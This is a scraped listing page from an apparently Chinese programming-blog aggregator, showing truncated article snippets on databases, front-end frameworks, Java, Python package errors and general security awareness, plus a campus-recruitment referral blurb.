                        <div>汤臣倍健,三七互娱,得物,顺丰,快手,游卡,oppo,康冠科技,途游游戏,埃科光电25秋招内推①得物【八大职类】技术、供应链、产品、运营、设计、职能、商品研究、风控等大类【内推码】RTHEA59【一键内推】https://poizon.jobs.feishu.cn/s/iMo1482J②汤臣倍健【招聘岗位】营销类、市场类、智造类、职能类【内推链接】https://sourl.cn/giXCGq【内</div>
                    </li>
                    <li><a href="/article/1834939331245076480.htm"
                           title="SQLServer2022新特性 GENERATE_SERIES函数" target="_blank">SQLServer2022新特性 GENERATE_SERIES函数</a>
                        <span class="text-muted">zxrhhm</span>
<a class="tag" taget="_blank" href="/search/sqlserver/1.htm">sqlserver</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a>
                        <div>SQLServer2022新特性GENERATE_SERIES函数,在给定间隔内生成一系列数字。序列值之间的间隔和步骤由用户定义。参考官方地址https://learn.microsoft.com/en-us/sql/t-sql/functions/generate-series-transact-sql?view=sql-server-ver161、本文内容语法参数返回类型权限示例相关内容适用于</div>
                    </li>
                    <li><a href="/article/1834937190321319936.htm"
                           title="java mongodb group分组使用" target="_blank">java mongodb group分组使用</a>
                        <span class="text-muted">yank1225</span>
<a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a><a class="tag" taget="_blank" href="/search/group/1.htm">group</a>
                        <div>mongodb的关键字及介绍.mongodb的查询是有一定规则的,刚开始接触老是各种错误,参照以下内容有很多帮助https://docs.mongodb.com/manual/reference/sql-aggregation-comparison/另外出现这种错误时Apipelinestagespecificationobjectmustcontainexactlyonefield是因为条件不对</div>
                    </li>
                    <li><a href="/article/1834934810754248704.htm"
                           title="苹果证书签名机制" target="_blank">苹果证书签名机制</a>
                        <span class="text-muted">路遇良人</span>

                        <div>开篇https://blog.csdn.net/huoyongjie/article/details/51777410</div>
                    </li>
                    <li><a href="/article/1834934669418786816.htm"
                           title="网络安全测评技术与标准" target="_blank">网络安全测评技术与标准</a>
                        <span class="text-muted">坚持可信</span>
<a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>网络安全测评是评估信息系统、网络和应用程序的安全性,以发现潜在的漏洞和威胁,并确保系统符合安全标准和政策的过程。以下是常见的网络安全测评类型:1.渗透测试(PenetrationTesting)描述:通过模拟真实的攻击,评估系统、网络和应用程序的安全性,识别和修复漏洞。目标:发现系统中的安全漏洞,评估其可能被利用的风险。方法:黑盒测试:测试人员没有系统内部信息,模拟外部攻击者。白盒测试:测试人员拥</div>
                    </li>
                    <li><a href="/article/1834932022519361536.htm"
                           title="Oozie Bundle 规范" target="_blank">Oozie Bundle 规范</a>
                        <span class="text-muted">weixin_34075268</span>

                        <div>为什么80%的码农都做不了架构师?&gt;&gt;&gt;文档地址转载于:https://my.oschina.net/sskxyz/blog/756359</div>
                    </li>
                    <li><a href="/article/1834931138968252416.htm"
                           title="1.25-1.26 Coordinator数据集和oozie bundle" target="_blank">1.25-1.26 Coordinator数据集和oozie bundle</a>
                        <span class="text-muted">weixin_30851867</span>

                        <div>一、Coordinator数据集二、ooziebundle转载于:https://www.cnblogs.com/weiyiming007/p/10881260.html</div>
                    </li>
                    <li><a href="/article/1834926470724677632.htm"
                           title="uniapp设计H5 tabbar会遮挡内容区的解决办法" target="_blank">uniapp设计H5 tabbar会遮挡内容区的解决办法</a>
                        <span class="text-muted">qq_39016177</span>
<a class="tag" taget="_blank" href="/search/uni-app/1.htm">uni-app</a>
                        <div>uniapp设计H5tabbar会遮挡内容区的解决办法1.现象底部tabbar会遮挡内容区最底部的文字2.解决方法—css中增加个padding-bottom:var(–window-bottom)这样就是好了官方依据官方文档链接https://uniapp.dcloud.net.cn/tutorial/syntax-css.html#css-%E5%8F%98%E9%87%8F诸君有用且点赞</div>
                    </li>
                    <li><a href="/article/1834926216486940672.htm"
                           title="JS 获取数组对象中某个属性的最大值或最小值" target="_blank">JS 获取数组对象中某个属性的最大值或最小值</a>
                        <span class="text-muted">qq_36437172</span>
<a class="tag" taget="_blank" href="/search/JS/1.htm">JS</a><a class="tag" taget="_blank" href="/search/Math.max/1.htm">Math.max</a><a class="tag" taget="_blank" href="/search/Math.min/1.htm">Math.min</a><a class="tag" taget="_blank" href="/search/sort/1.htm">sort</a><a class="tag" taget="_blank" href="/search/apply/1.htm">apply</a>
                        <div>最近的开发中经常会遇到前端自己生成唯一id,然后在数组中增加删除插入对象,这样一来就要的要当前使用的id的最大值。总结一下,有两种比较简便的方法可以做到:1.将属性值通过map生成一个数组,再使用Math.max取最大值2.使用排序sort,先对数组的项排序,再取排序后的对应的项的值数组对象如下,求id的最大值和最小值list=[{id:1,name:'jack'},    {id:2,name:</div>
                    </li>
                    <li><a href="/article/1834926217485185024.htm"
                           title="vue 生成PDF(A4标准PDF分页)" target="_blank">vue 生成PDF(A4标准PDF分页)</a>
                        <span class="text-muted">qq_39016177</span>
<a class="tag" taget="_blank" href="/search/HTML2Canvas/1.htm">HTML2Canvas</a><a class="tag" taget="_blank" href="/search/jsPDF/1.htm">jsPDF</a><a class="tag" taget="_blank" href="/search/%E5%AF%BC%E5%87%BA/1.htm">导出</a><a class="tag" taget="_blank" href="/search/PDF%E8%BD%AC%E6%8D%A2/1.htm">PDF转换</a><a class="tag" taget="_blank" href="/search/DOM%E6%93%8D%E4%BD%9C/1.htm">DOM操作</a>
                        <div>1.先安装两个插件//页面转图片npminstall--savehtml2canvas//图片转PDFnpminstalljspdf--save 2.在需要导出的dom节点增加ref='pdf'例如  这是待转换的页面,点击导出点击导出PDF3.定义导出方法handleExport(){   downloadPDF(this.$refs.pdf);},4.在页面导入 import{download</div>
                    </li>
                    <li><a href="/article/1834925081566998528.htm"
                           title="Prism 教程" target="_blank">Prism 教程</a>
                        <span class="text-muted">yang_B621</span>
<a class="tag" taget="_blank" href="/search/Prism/1.htm">Prism</a><a class="tag" taget="_blank" href="/search/IOC/1.htm">IOC</a>
                        <div>http://t.csdnimg.cn/VXSSvhttps://blog.csdn.net/u010476739/article/details/119341731Prism-随笔分类-Hello——寻梦者!-博客园(cnblogs.com)C#IoC学习笔记-缥缈的尘埃-博客园(cnblogs.com)WPF_SchuylerEX的博客-CSDN博客</div>
                    </li>
                    <li><a href="/article/1834924577172582400.htm"
                           title="CURL 发送POST请求" target="_blank">CURL 发送POST请求</a>
                        <span class="text-muted">微赚淘客系统@聚娃科技</span>
<a class="tag" taget="_blank" href="/search/post%E8%AF%B7%E6%B1%82/1.htm">post请求</a>
                        <div>CURL发送POST请求大家好,我是免费搭建查券返利机器人赚佣金就用微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!今天,我们将探讨在命令行中使用CURL发送POST请求的详细步骤和用法。什么是CURL?CURL是一个命令行工具和库,用于传输数据,支持众多协议,包括HTTP、HTTPS、FTP、FTPES等。它是开源且跨平台的,广泛应用于网络开发中。CURL发送POST请求的基本</div>
                    </li>
                    <li><a href="/article/1834920164567642112.htm"
                           title="前端同学必备:教你如何安装、使用Chrome的vue-devtools插件" target="_blank">前端同学必备:教你如何安装、使用Chrome的vue-devtools插件</a>
                        <span class="text-muted">界忆</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF%E7%BC%96%E7%A8%8B/1.htm">前端编程</a><a class="tag" taget="_blank" href="/search/Vue-devtools%E6%8F%92%E4%BB%B6/1.htm">Vue-devtools插件</a><a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/devtools/1.htm">devtools</a>
                        <div>I.介绍vue-devtools插件Vue-devtools是一个Chrome浏览器插件,它是一个浏览器调试工具,用于开发Vue.js应用程序。它可以用于Vue.js应用程序的调试,可以更好地了解应用程序的结构和状态,以及帮助快速修复代码错误。Vue-devtools插件的作用和优势如下:1.调试Vue.js应用程序:Vue-devtools是一个强大的调试工具,可以帮助开发人员正确地调试应用程序</div>
                    </li>
                    <li><a href="/article/1834919786136563712.htm"
                           title="基于nodejs+vue的美妆彩妆网站的设计与实现(源码+LW+调试文档+讲解等)" target="_blank">基于nodejs+vue的美妆彩妆网站的设计与实现(源码+LW+调试文档+讲解等)</a>
                        <span class="text-muted">程序员gelei</span>
<a class="tag" taget="_blank" href="/search/nodejs%E6%AF%95%E4%B8%9A%E8%AE%BE%E8%AE%A1%E9%A1%B9%E7%9B%AE/1.htm">nodejs毕业设计项目</a><a class="tag" taget="_blank" href="/search/vue.js/1.htm">vue.js</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a>
                        <div>目录:博主介绍:完整视频演示:系统技术介绍:后端Java介绍前端框架Vue介绍具体功能截图:部分代码参考:Mysql表设计参考:项目测试:项目论文:为什么选择我:源码获取:博主介绍:博主:程序员gelei:全网拥有20W+粉丝、CSDN作者、博客专家、全栈领域优质创作者、平台优质Java创作者、专注于Java、小程序、python、安卓技术领域和毕业项目实战✌Java精品实战案例《1000套》20</div>
                    </li>
                    <li><a href="/article/1834916762458615808.htm"
                           title="Android面试必问的Activity,初阶,中高阶问法,你都掌握了吗?(要求熟读并背诵全文)" target="_blank">Android面试必问的Activity,初阶,中高阶问法,你都掌握了吗?(要求熟读并背诵全文)</a>
                        <span class="text-muted">chuhe1989</span>
<a class="tag" taget="_blank" href="/search/android%E8%BF%9B%E9%98%B6/1.htm">android进阶</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a><a class="tag" taget="_blank" href="/search/Android%E5%BC%80%E5%8F%91/1.htm">Android开发</a><a class="tag" taget="_blank" href="/search/android/1.htm">android</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95/1.htm">面试</a>
                        <div>[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cXs1wGDx-1605843173409)(https://upload-images.jianshu.io/upload_images/24142630-84668ed4a42819ee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]Activity</div>
                    </li>
                    <li><a href="/article/1834913988593414144.htm"
                           title="2021国家开放大学计算机网络安全技术形成性考核五" target="_blank">2021国家开放大学计算机网络安全技术形成性考核五</a>
                        <span class="text-muted">chaoliang.top</span>
<a class="tag" taget="_blank" href="/search/%E5%9B%BD%E5%BC%80%E8%AF%95%E9%A2%98/1.htm">国开试题</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>本人还会继续更新其他国家开放大学的试题,请大家多多关注,如果有什么建议,还希望大家提出来,本人也好完善本人在测试答案的时候发现,本章考试回顾结果中明明选对了答案,但是提示错误的情况,并且该题没有提示正确答案,这种情况应该是国开试题出现bug导致,请大家不要担心,如果有追求完美的同学,多答几次,可能就会避开这种题,因为出题是随机的。1.SQL注入一般可通过网页表单直接输入选择多项:对错正确答案:对2</div>
                    </li>
                    <li><a href="/article/1834910587067396096.htm"
                           title="如何提高网络安全意识" target="_blank">如何提高网络安全意识</a>
                        <span class="text-muted">亿林网络安全事业部</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>提升网络安全意识的方法提升网络安全意识是个人和企业都需要重视的问题。以下是一些有效的方法:加强教育和培训:通过参加网络安全培训课程,学习识别网络攻击的常见迹象、安全密码的设置、不点击可疑链接等知识。建立网络安全政策:制定个人网络安全规则,如定期更改密码、不在公共网络上进行敏感操作等。定期更新系统:保持操作系统和软件程序的最新状态,及时修补安全漏洞。加强网络防护:使用防火墙、反病毒软件、入侵检测系统</div>
                    </li>
                    <li><a href="/article/1834909327081697280.htm"
                           title="Apache POI用法" target="_blank">Apache POI用法</a>
                        <span class="text-muted">JH3073</span>
<a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a>
                        <div>一、ApachePOI是什么ApachePOI是用Java编写的免费开源的跨平台的JavaAPI,ApachePOI提供API给Java程序对MicrosoftOffice格式档案读和写的功能,其中使用最多的就是使用POI操作Excel文件。二、POI结构HSSF-提供读写MicrosoftExcelXLS格式档案的功能XSSF-提供读写MicrosoftExcelOOXMLXLSX格式档案的功能</div>
                    </li>
                    <li><a href="/article/1834905169196838912.htm"
                           title="uniapp+uview-plus实现微信小程序自定义tabbar" target="_blank">uniapp+uview-plus实现微信小程序自定义tabbar</a>
                        <span class="text-muted">yx_back</span>
<a class="tag" taget="_blank" href="/search/%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">小程序</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/uniapp/1.htm">uniapp</a><a class="tag" taget="_blank" href="/search/uni-app/1.htm">uni-app</a><a class="tag" taget="_blank" href="/search/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F/1.htm">微信小程序</a><a class="tag" taget="_blank" href="/search/uview-plus/1.htm">uview-plus</a>
                        <div>参考文档微信小程序相关开发文档链接:https://developers.weixin.qq.com/miniprogram/dev/framework/ability/custom-tabbar.html虽然是uniapp框架但是实现方式和原生小程序相似实现思路1、app.json里面tabBar添加配置custom:true,其他和非自定义设置一样2、在components文件夹里添加Tabb</div>
                    </li>
                    <li><a href="/article/1834902397802082304.htm"
                           title="记录:在ubuntu中以C语言实现json文件读取遇到的问题(1)(说不定会有2)" target="_blank">记录:在ubuntu中以C语言实现json文件读取遇到的问题(1)(说不定会有2)</a>
                        <span class="text-muted">fighting_dou</span>
<a class="tag" taget="_blank" href="/search/ubuntu/1.htm">ubuntu</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a>
                        <div>[4.12]记录在ubuntu中以C语言实现json文件读取遇到的问题(1)(说不定会有2)(暂记录遇到的问题及解决,其中还有些原因没有搞明白)1.首先过程参考自一位大佬的博文(目前找到的c语言解析json文件很详细的博文了,感谢博主!):https://blog.csdn.net/qq_35522096/article/details/115358647?utm_medium=distribut</div>
                    </li>
                    <li><a href="/article/1834898490354921472.htm"
                           title="linux json编译报错" target="_blank">linux json编译报错</a>
                        <span class="text-muted">nancynull</span>
<a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/Linux/1.htm">Linux</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E8%AF%91/1.htm">编译</a>
                        <div>背景:ubuntu16.04,使用apt-get安装过jsoncpp问题一:编译时报找不到json.h问题二:编译.so时,提示/usr/bin/ld:cannotfind-ljson解决方案:https://stackoverflow.com/questions/36861355/fatal-error-with-jsoncpp-while-compiling具体翻译如下:针对问题一:修改#in</div>
                    </li>
                    <li><a href="/article/1834896977599492096.htm"
                           title="CTF——web方向学习攻略" target="_blank">CTF——web方向学习攻略</a>
                        <span class="text-muted">一则孤庸</span>
<a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/CTF/1.htm">CTF</a>
                        <div>1计算机基础操作系统:熟悉Linux命令,方便使用Kali。网络技术:HCNA、CCNA。编程能力:拔高项,有更好。2web应用HTTP协议:必须掌握web开发框架web安全测试3数据库数据库基本操作SQL语句数据库优化4刷题</div>
                    </li>
                    <li><a href="/article/1834896851225112576.htm"
                           title="项目内部调用的远程接口开发" target="_blank">项目内部调用的远程接口开发</a>
                        <span class="text-muted">cyt涛</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/OpenFeign/1.htm">OpenFeign</a><a class="tag" taget="_blank" href="/search/%E8%BF%9C%E7%A8%8B%E8%B0%83%E7%94%A8/1.htm">远程调用</a><a class="tag" taget="_blank" href="/search/FeignClient/1.htm">FeignClient</a><a class="tag" taget="_blank" href="/search/%E5%86%85%E9%83%A8%E8%B0%83%E7%94%A8/1.htm">内部调用</a><a class="tag" taget="_blank" href="/search/%E5%90%8C%E6%AD%A5%E8%B0%83%E7%94%A8/1.htm">同步调用</a><a class="tag" taget="_blank" href="/search/%E8%BF%9C%E7%A8%8B%E6%8E%A5%E5%8F%A3/1.htm">远程接口</a>
                        <div>编写一个项目内部调用的远程接口通常是为了在分布式系统或者微服务架构中,实现各个服务之间的通信和数据交换。这样的远程接口专门用于服务之间的调用,而不是直接暴露给外部用户或前端。项目内部的远程接口统一放在api工程首先进入api编写接口,注意使用@FeignClient注解进入服务提供者微服务,编写接口实现类1.在api工程中编写接口在api工程中,定义远程调用的接口。这个接口将通过Feign进行服务</div>
                    </li>
                    <li><a href="/article/1834889286948843520.htm"
                           title="fetch-event-source 如何通过script全局引入" target="_blank">fetch-event-source 如何通过script全局引入</a>
                        <span class="text-muted">cuiyuchen111</span>
<a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>fetchEventSource源码中导出了两种类型的包cjs和esm。但是有个需求如何在原生是js中通过script标签引呢?需要加上type=module。今天介绍另一种方法下载源码文件:https://github.com/Azure/fetch-event-source.git安装:npminstall--save-devwebpackwebpack-clits-loadertypescr</div>
                    </li>
                    <li><a href="/article/1834887649203154944.htm"
                           title="12312312" target="_blank">12312312</a>
                        <span class="text-muted">二进制掌控者</span>
<a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a>
                        <div>c语言中的小小白-CSDN博客c语言中的小小白关注算法,c++,c语言,贪心算法,链表,mysql,动态规划,后端,线性回归,数据结构,排序算法领域.https://blog.csdn.net/bhbcdxb123?spm=1001.2014.3001.5343给大家分享一句我很喜欢我话:知不足而奋进,望远山而前行!!!铁铁们,成功的路上必然是孤独且艰难的,但是我们不可以放弃,远山就在前方,但我们</div>
                    </li>
                    <li><a href="/article/1834887271157952512.htm"
                           title="你知道什么是回调函数吗?" target="_blank">你知道什么是回调函数吗?</a>
                        <span class="text-muted">二进制掌控者</span>
<a class="tag" taget="_blank" href="/search/%23C%E8%AF%AD%E8%A8%80%E4%B8%93%E6%A0%8F/1.htm">#C语言专栏</a><a class="tag" taget="_blank" href="/search/c%E8%AF%AD%E8%A8%80/1.htm">c语言</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>c语言中的小小白-CSDN博客c语言中的小小白关注算法,c++,c语言,贪心算法,链表,mysql,动态规划,后端,线性回归,数据结构,排序算法领域.https://blog.csdn.net/bhbcdxb123?spm=1001.2014.3001.5343给大家分享一句我很喜欢我话:知不足而奋进,望远山而前行!!!铁铁们,成功的路上必然是孤独且艰难的,但是我们不可以放弃,远山就在前方,但我们</div>
                    </li>
                    <li><a href="/article/1834887019084476416.htm"
                           title="安装torch报错 raise ReadTimeoutError(self._pool, None, “Read timed out.“) pip._vendor.urllib3.exceptions" target="_blank">安装torch报错 raise ReadTimeoutError(self._pool, None, “Read timed out.“) pip._vendor.urllib3.exceptions</a>
                        <span class="text-muted">待磨的钝刨</span>
<a class="tag" taget="_blank" href="/search/pip/1.htm">pip</a><a class="tag" taget="_blank" href="/search/pytorch/1.htm">pytorch</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                        <div>文章目录1.配置cuda的torch环境时报错1.配置命令2.报错bug2.解决方法1.增加下载超时时间:2.尝试使用镜像源:3.检查网络连接:4.分次安装:5.重试安装:6.手动下载.whl文件安装1.配置cuda的torch环境时报错1.配置命令pipinstalltorch==2.0.1torchvision==0.15.2torchaudio==2.0.2--index-urlhttps:</div>
                    </li>
                                <li><a href="/article/124.htm"
                                       title="mysql主从数据同步" target="_blank">mysql主从数据同步</a>
                                    <span class="text-muted">林鹤霄</span>
<a class="tag" taget="_blank" href="/search/mysql%E4%B8%BB%E4%BB%8E%E6%95%B0%E6%8D%AE%E5%90%8C%E6%AD%A5/1.htm">mysql主从数据同步</a>
                                    <div>配置mysql5.5主从服务器(转)   
教程开始:一、安装MySQL 
说明:在两台MySQL服务器192.168.21.169和192.168.21.168上分别进行如下操作,安装MySQL 5.5.22 
&nbsp;二、配置MySQL主服务器(192.168.21.169)mysql&nbsp;&nbsp;-uroot&nbsp;&nbsp;-p&nbsp;&nbsp;&nbsp;&nb</div>
                                </li>
                                <li><a href="/article/251.htm"
                                       title="oracle学习笔记" target="_blank">oracle学习笔记</a>
                                    <span class="text-muted">caoyong</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a>
                                    <div>1、ORACLE的安装 
&nbsp;&nbsp; a&gt;、ORACLE的版本 
&nbsp;&nbsp; 8i,9i :&nbsp;&nbsp; i是internet 
&nbsp;&nbsp; 10g,11g : grid (网格) 
&nbsp;&nbsp; 12c : cloud (云计算) 
&nbsp;&nbsp; 
&nbsp;&nbsp; b&gt;、10g不支持win7 
&</div>
                                </li>
                                <li><a href="/article/378.htm"
                                       title="数据库,SQL零基础入门" target="_blank">数据库,SQL零基础入门</a>
                                    <span class="text-muted">天子之骄</span>
<a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93%E5%85%A5%E9%97%A8/1.htm">数据库入门</a><a class="tag" taget="_blank" href="/search/%E5%9F%BA%E6%9C%AC%E6%9C%AF%E8%AF%AD/1.htm">基本术语</a>
                                    <div>数据库,SQL零基础入门 
&nbsp; &nbsp; &nbsp; &nbsp;做网站肯定离不开数据库,本人之前没怎么具体接触SQL,这几天起早贪黑得各种入门,恶补脑洞。一些具体的知识点,可以让小白不再迷茫的术语,拿来与大家分享。 
&nbsp; 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 数据库,永久数据的一个或多个大型结构化集合,通常与更新和查询数据的软件相关</div>
                                </li>
                                <li><a href="/article/505.htm"
                                       title="pom.xml" target="_blank">pom.xml</a>
                                    <span class="text-muted">一炮送你回车库</span>
<a class="tag" taget="_blank" href="/search/pom.xml/1.htm">pom.xml</a>
                                    <div>1、一级元素dependencies是可以被子项目继承的 
2、一级元素dependencyManagement是定义该项目群里jar包版本号的,通常和一级元素properties一起使用,既然有继承,也肯定有一级元素modules来定义子元素 
3、父项目里的一级元素&lt;modules&gt; 
&lt;module&gt;lcas-admin-war&lt;/module&gt; 
&lt</div>
                                </li>
                                <li><a href="/article/632.htm"
                                       title="sql查地区省市县" target="_blank">sql查地区省市县</a>
                                    <span class="text-muted">3213213333332132</span>
<a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a>
                                    <div>
-- db_yhm_city   
SELECT * FROM db_yhm_city WHERE class_parent_id = 1 -- 海南 class_id = 9 港、奥、台 class_id = 33、34、35   
  
SELECT * FROM db_yhm_city WHERE class_parent_id =169   
  
SELECT d1.cla</div>
                                </li>
                                <li><a href="/article/759.htm"
                                       title="关于监听器那些让人头疼的事" target="_blank">关于监听器那些让人头疼的事</a>
                                    <span class="text-muted">宝剑锋梅花香</span>
<a class="tag" taget="_blank" href="/search/%E7%94%BB%E5%9B%BE%E6%9D%BF/1.htm">画图板</a><a class="tag" taget="_blank" href="/search/%E7%9B%91%E5%90%AC%E5%99%A8/1.htm">监听器</a><a class="tag" taget="_blank" href="/search/%E9%BC%A0%E6%A0%87%E7%9B%91%E5%90%AC%E5%99%A8/1.htm">鼠标监听器</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 本人初学JAVA,对于界面开发我只能说有点蛋疼,用JAVA来做界面的话确实需要一定的耐心(不使用插件,就算使用插件的话也没好多少)既然Java提供了界面开发,老师又要求做,只能硬着头皮上啦。但是监听器还真是个难懂的地方,我是上了几次课才略微搞懂了些。 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</div>
                                </li>
                                <li><a href="/article/886.htm"
                                       title="JAVA的遍历MAP" target="_blank">JAVA的遍历MAP</a>
                                    <span class="text-muted">darkranger</span>
<a class="tag" taget="_blank" href="/search/map/1.htm">map</a>
                                    <div>Java Map遍历方式的选择 
1. 阐述 
  对于Java中Map的遍历方式,很多文章都推荐使用entrySet,认为其比keySet的效率高很多。理由是:entrySet方法一次拿到所有key和value的集合;而keySet拿到的只是key的集合,针对每个key,都要去Map中额外查找一次value,从而降低了总体效率。那么实际情况如何呢? 
  为了解遍历性能的真实差距,包括在遍历ke</div>
                                </li>
                                <li><a href="/article/1013.htm"
                                       title="POJ 2312 Battle City 优先多列+bfs" target="_blank">POJ 2312 Battle City 优先多列+bfs</a>
                                    <span class="text-muted">aijuans</span>
<a class="tag" taget="_blank" href="/search/%E6%90%9C%E7%B4%A2/1.htm">搜索</a>
                                    <div>来源:http://poj.org/problem?id=2312 
题意:题目背景就是小时候玩的坦克大战,求从起点到终点最少需要多少步。已知S和R是不能走得,E是空的,可以走,B是砖,只有打掉后才可以通过。 
思路:很容易看出来这是一道广搜的题目,但是因为走E和走B所需要的时间不一样,因此不能用普通的队列存点。因为对于走B来说,要先打掉砖才能通过,所以我们可以理解为走B需要两步,而走E是指需要1</div>
                                </li>
                                <li><a href="/article/1140.htm"
                                       title="Hibernate与Jpa的关系,终于弄懂" target="_blank">Hibernate与Jpa的关系,终于弄懂</a>
                                    <span class="text-muted">avords</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Hibernate/1.htm">Hibernate</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/jpa/1.htm">jpa</a>
                                    <div>我知道Jpa是一种规范,而Hibernate是它的一种实现。除了Hibernate,还有EclipseLink(曾经的toplink),OpenJPA等可供选择,所以使用Jpa的一个好处是,可以更换实现而不必改动太多代码。 
在play中定义Model时,使用的是jpa的annotations,比如javax.persistence.Entity, Table, Column, OneToMany</div>
                                </li>
                                <li><a href="/article/1267.htm"
                                       title="酸爽的console.log" target="_blank">酸爽的console.log</a>
                                    <span class="text-muted">bee1314</span>
<a class="tag" taget="_blank" href="/search/console/1.htm">console</a>
                                    <div>在前端的开发中,console.log那是开发必备啊,简直直观。通过写小函数,组合大功能。更容易测试。但是在打版本时,就要删除console.log,打完版本进入开发状态又要添加,真不够爽。重复劳动太多。所以可以做些简单地封装,方便开发和上线。 
/**
 * log.js hufeng
 * The safe wrapper for `console.xxx` functions
 *  </div>
                                </li>
                                <li><a href="/article/1394.htm"
                                       title="哈佛教授:穷人和过于忙碌的人有一个共同思维特质" target="_blank">哈佛教授:穷人和过于忙碌的人有一个共同思维特质</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/%E6%97%B6%E9%97%B4%E7%AE%A1%E7%90%86/1.htm">时间管理</a><a class="tag" taget="_blank" href="/search/%E5%8A%B1%E5%BF%97%E4%BA%BA%E7%94%9F/1.htm">励志人生</a><a class="tag" taget="_blank" href="/search/%E7%A9%B7%E4%BA%BA/1.htm">穷人</a><a class="tag" taget="_blank" href="/search/%E8%BF%87%E4%BA%8E%E5%BF%99%E7%A2%8C/1.htm">过于忙碌</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 一个跨学科团队今年完成了一项对资源稀缺状况下人的思维方式的研究,结论是:穷人和过于忙碌的人有一个共同思维特质,即注意力被稀缺资源过分占据,引起认知和判断力的全面下降。这项研究是心理学、行为经济学和政策研究学者协作的典范。 
  这个研究源于穆来纳森对自己拖延症的憎恨。他7岁从印度移民美国,很快就如鱼得水,哈佛毕业</div>
                                </li>
                                <li><a href="/article/1521.htm"
                                       title="other operate" target="_blank">other operate</a>
                                    <span class="text-muted">征客丶</span>
<a class="tag" taget="_blank" href="/search/OS/1.htm">OS</a><a class="tag" taget="_blank" href="/search/osx/1.htm">osx</a>
                                    <div>一、Mac Finder 设置排序方式,预览栏 在显示-》查看显示选项中 
二、有时预览显示时,卡死在那,有可能是一些临时文件夹被删除了,如:/private/tmp[有待验证] 
 
-------------------------------------------------------------------- 
若有其他凝问或文中有错误,请及时向我指出, 
我好及时改正,同时也让我们一</div>
                                </li>
                                <li><a href="/article/1648.htm"
                                       title="【Scala五】分析Spark源代码总结的Scala语法三" target="_blank">【Scala五】分析Spark源代码总结的Scala语法三</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/scala/1.htm">scala</a>
                                    <div>1. If语句作为表达式 
    val properties = if (jobIdToActiveJob.contains(jobId)) {
      jobIdToActiveJob(stage.jobId).properties
    } else {
